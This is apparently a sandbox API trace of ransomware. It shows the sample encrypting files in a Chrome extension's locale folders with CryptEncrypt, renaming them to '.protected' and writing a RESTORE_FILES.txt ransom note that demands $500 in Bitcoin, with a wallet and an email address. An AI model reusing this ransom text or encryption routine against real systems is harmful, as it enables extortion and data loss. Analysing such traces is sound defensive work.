(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.679] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.679] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.679] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd6, lpOverlapped=0x0) returned 1 [0078.680] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.680] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd6, lpOverlapped=0x0) returned 1 [0078.680] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.680] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.680] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.680] CloseHandle (hObject=0x168) returned 1 [0078.680] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.protected") returned 165 [0078.680] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.protected")) returned 1 [0078.681] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.681] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.681] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\RESTORE_FILES.txt") returned 159 [0078.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.682] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.682] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.683] lstrlenA (lpString="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") returned 684 [0078.683] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0078.683] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.683] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.683] CloseHandle (hObject=0x164) returned 1 [0078.683] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.683] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0078.683] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0078.683] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0078.683] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0078.683] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0078.683] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned 141 [0078.683] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0078.683] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0078.683] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*") returned 143 [0078.683] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.683] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.684] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.684] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.684] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.684] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.684] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\.") returned 143 [0078.684] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.684] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.684] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.684] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.684] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.684] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.684] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.684] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\..") returned 144 [0078.684] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.684] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.684] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.684] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.684] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.684] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0078.684] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.684] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.684] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.684] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.684] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.684] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.684] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.685] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.685] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.685] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.685] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.685] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.685] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.685] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0078.686] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.686] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0078.686] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.686] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.686] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.686] CloseHandle (hObject=0x168) returned 1 [0078.686] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.protected") returned 165 [0078.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.protected")) returned 1 [0078.687] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.687] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.687] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\RESTORE_FILES.txt") returned 159 [0078.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.687] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.687] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.696] lstrlenA (lpString="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") returned 684 [0078.696] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0078.696] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.696] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.696] CloseHandle (hObject=0x164) returned 1 [0078.696] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.696] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0078.696] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0078.696] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0078.696] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0078.696] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0078.696] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned 142 [0078.696] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0078.696] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0078.696] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*") returned 144 [0078.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0078.698] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.698] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.698] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.698] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.698] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.698] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\.") returned 144 [0078.698] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.698] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.698] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.698] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.698] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.698] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.698] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.698] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\..") returned 145 [0078.698] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.698] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.698] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.698] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.698] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.698] lstrcmpiW (lpString1="messages.json", lpString2="Program Files 
(x86)") returned -1 [0078.698] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.698] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.698] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.698] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.698] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.698] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.698] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.699] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.699] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.699] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.699] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.700] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.700] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.700] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.700] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.700] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.700] CloseHandle (hObject=0x168) returned 1 [0078.701] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
